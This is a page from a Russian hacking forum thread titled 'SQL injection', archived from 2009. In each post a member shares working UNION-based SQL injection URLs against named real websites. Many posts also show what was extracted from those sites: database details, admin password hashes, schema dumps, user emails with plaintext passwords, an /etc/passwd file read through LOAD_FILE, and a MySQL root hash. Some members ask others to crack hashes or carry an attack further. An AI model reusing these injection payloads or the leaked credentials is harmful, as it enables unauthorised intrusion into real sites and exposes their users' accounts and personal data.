ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
Страница 751 из 1242 « Первая < 251651701741 747 748 749 750 751 752 753 754 755 761801851 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7501  
Старый 16.01.2009, 08:54
Gedj
Познающий
Регистрация: 15.09.2008
Сообщений: 54
Провел на форуме:
612815

Репутация: 46
По умолчанию
Код:
http://www.inforealt.ru/content/?id=-1+union+select+1,concat(login,0x3a,passwd),3,4,5,6,7,8,9,10+from+sitexpert_users--
 

  #7502  
Старый 16.01.2009, 10:15
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию
Код:
http://www.exclusivewebsolutions.co.uk/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())--
user(): web225-a-joo-133@localhost
version(): 5.0.67-community
database(): web225-a-joo-133

admin:5146ece4d7ee8bea2996a94aa5b4d72f:ltQAvqnDA0X CLWk0N2kI0Ns2qW9SWEry

PR = 2

Код:
http://www.seeleman.nl/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())--
user(): md106698db52069@blade27.geenpunt.nl
version(): 5.0.32-Debian_7etch6
database(): md106698db52069

admin:c30cc14f6a417d111ebac62c3fb38d66:M1Cw74qU76Q Wf9nem8O85DTQcFLU2kTz
Последний раз редактировалось z00MAN; 16.01.2009 в 10:17..
 

  #7503  
Старый 16.01.2009, 10:24
vakula
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485

Репутация: 4
По умолчанию
Магазиинчик

Код:
http://www.colortek-shop.ru/instr_full.php?pub_id=-3%20UNION%20SELECT%201,concat_ws(0x3a,user(),version(),database()),3
version:: 5.0.32-Debian_7etch1-log
user::z40650_1@77.221.130.9
database:: z40650_1

Код:
http://www.newslook.ru/index.php?id=999999%20UNION%20SELECT%201,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10
version::5.0.67
user::newslook@localhost
database::newslook
Последний раз редактировалось vakula; 16.01.2009 в 13:47..
 

  #7504  
Старый 16.01.2009, 15:31
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
Ultimate Collection of quality software!!!

http://www.sharewareriver.com/product.php?id=3318908098+union+select+1,2,3,4,5,6 ,7,concat_ws(0x3a,user(),version(),database()),9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23--


Database Version: 5.0.45-log
Database name: a0020843
User name: zoika@cgi1001.int.bizland.net

Database [a0020843]

Table [advertise (3 Rows)]
id
prod_id
cat_id
start_date
end_date
order_id
comments
Table [authors (25584 Rows)]
id
title
homepage
e_mail
regnow_id
PASSWORD
linked
shareit_id
subscribed
Table [categories (111 Rows)]
id
title
LEVEL
parent_id
display_order
Table [keywords (1 Rows)]
id
keywords
author_id
prod_id
show_price
shows
rnd
devisor
counter
start_date
payment
ballance
order_id
screenshot
comments
Table [kwd_reserve (3 Rows)]
id
keywords
price
deposit
date_added
e_mail
Table [order_urls (5123 Rows)]
id
prod_id
date_added
new_url
Table [products (71626 Rows)]
id
author_id
cat_id
title
version
platform
short_desc
long_desc
price
size
download_url
order_url
hits
hits0
rating
screenshot_url
date_added
featured
keywords
status
order_url0

Достаём юзеров лимитом их там за 25 косарей


http://www.sharewareriver.com/product.php?id=3318908098+UNION+SELECT+1,2,3,4,5,6 ,7,CONCAT(0x7873716C696E6A626567696E,(SELECT+CONCA T(id,0x7873716C696E6A64656C,title,0x7873716C696E6A 64656C,e_mail,0x7873716C696E6A64656C,PASSWORD)+FRO M+a0020843.authors+LIMIT+1,1),0x7873716C696E6A656E 64),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--


[1]:4:#1 ACE:admin@cyber-webcom.com:X2nJ9tBh
[2]:5:MeanFox:meanfox@meanfox.com:fwpfwpfw
[3]:6:10-Strike Software:dstep@mail.uln.ru:nRHP8Psg


Далее скучно....


http://www.sharewareriver.com/product.php?id=3318908098+UNION+SELECT+1,2,3,4,5,6 ,7,CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2 F6574632F706173737764),0x7873716C696E6A656E64),9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23--


Читаем /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13roxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:101:65534::/var/lib/nfs:/bin/false
snmp:x:102:65534::/var/lib/snmp:/bin/false
ntp:x:103:103::/home/ntp:/bin/false
mysql:x:1000:104::/home/mysql:/bin/sh
exim:x:104:105::/var/spool/exim4:/bin/false
bacula:x:105:106:Bacula:/var/lib/bacula:/bin/false
Последний раз редактировалось spherics; 16.01.2009 в 15:35..
 

  #7505  
Старый 16.01.2009, 16:59
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию
gooody.at
Код:
http://www.gooody.at/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())
user(): db1070925-gooody
version(): 5.0.32-Debian_7etch8-log
database(): dbu1070925@localhost
PR=3

admin:4a03c8d6910be8db872e6dc4f70ee4ed:kouCfOZj8PY Kj690MgWP7BY7ljmthHtr


"Гостиный дом"
Код:
http://gostidom.com/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(user(),0x3a,version(),0x3a,database())
user(): _bdgosti
version(): 5.0.45
database(): myroot@localhost

admin:7c2adff331c4807dd7d2d9dc0cd8bc10:08ayLZq2giq NZsBQDTf9xS2BXTGDmxqC
Последний раз редактировалось z00MAN; 16.01.2009 в 17:05..
 

  #7506  
Старый 16.01.2009, 19:09
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
http://www.pre-trib.org/article-view.php?id=3809809832+union+select+1,2,concat_ws( 0x3a,user(),version(),database()),4,5,6,7,8--


User:web_user@localhost
Version:5.0.45-Debian_1ubuntu3.4-log
Databasere_trib_new

/home/pre_trib/releases/20090114_220536/article-view.php

Достаём Рута

http://www.pre-trib.org/article-view.php?id=3809809832+union+select+1,2,concat_ws( 0x3a,user,password),4,5,6,7,8+from+mysql.user--


root:*85BCC49962DFC4BE4580D8D14155504478DC9461
 

  #7507  
Старый 16.01.2009, 21:56
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию
http://www.ndsu.edu/wwwdev/ndsu_webcal/index.php?cid=-187%20union%20select%201,concat_ws(0x3a,lname,fnam e,email),3+from+administrators/*

https://www.lebow.drexel.edu/Newsroom/Newsletters/index.php?cid=-5+union+select+1,2,3,version(),5,6,7,8,9,10,11--

http://www.pemaquid.com/content-manager/story.php?cID=-86+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13--

http://www.latinoboxing.com/story.php?cid=-10382+union+select+1,2,3,4,version(),6--
 

  #7508  
Старый 16.01.2009, 22:30
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию
http://www.ex-elec.com/files/firm.php?id=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24+from+users+limit+0,1--

хеш расшифровывается так: bigbear

войти под логином admin и пассом bigbear не удается =(
Кто сможет - черкните =)
 

  #7509  
Старый 16.01.2009, 22:51
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию
https://www.bioinquire.com/product-profile.php?ID=-1+union+select+1,2,concat_ws(0x3a,email,userpass), 4,5,6,7,8,9,10,11,12+FROM+Tigeradmin_Users+limit+0 ,1+--

jeremy@jhousemedia.com:ta21XwWv/Yggk

чем пароль зашифрован - не могу понять?
 

  #7510  
Старый 17.01.2009, 09:30
sharoff
Познающий
Регистрация: 05.08.2007
Сообщений: 30
Провел на форуме:
242062

Репутация: 18
Отправить сообщение для sharoff с помощью ICQ
По умолчанию
Цитата:
http://www.detcenter.ru/index.php?str=-144+union+select+1,2,3,4,5,6,7,8,version(),10,11--
Цитата:
http://www.sovtest.ru/news.php?id=125+and+1=0+union+select+1,convert(use r()+using+cp1251),3,4,5,6,7,8
Кто хоть что-нибудь дальше раскрутит киньте в ПМ хотя бы название таблы...на парочке есть phpbb, но то ли префиксов незнаем, то ли БД другая..
Последний раз редактировалось jokester; 17.01.2009 в 11:50.. Причина: Убрал БОЯНЫ
 
 
Страница 751 из 1242 « Первая < 251651701741 747 748 749 750 751 752 753 754 755 761801851 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ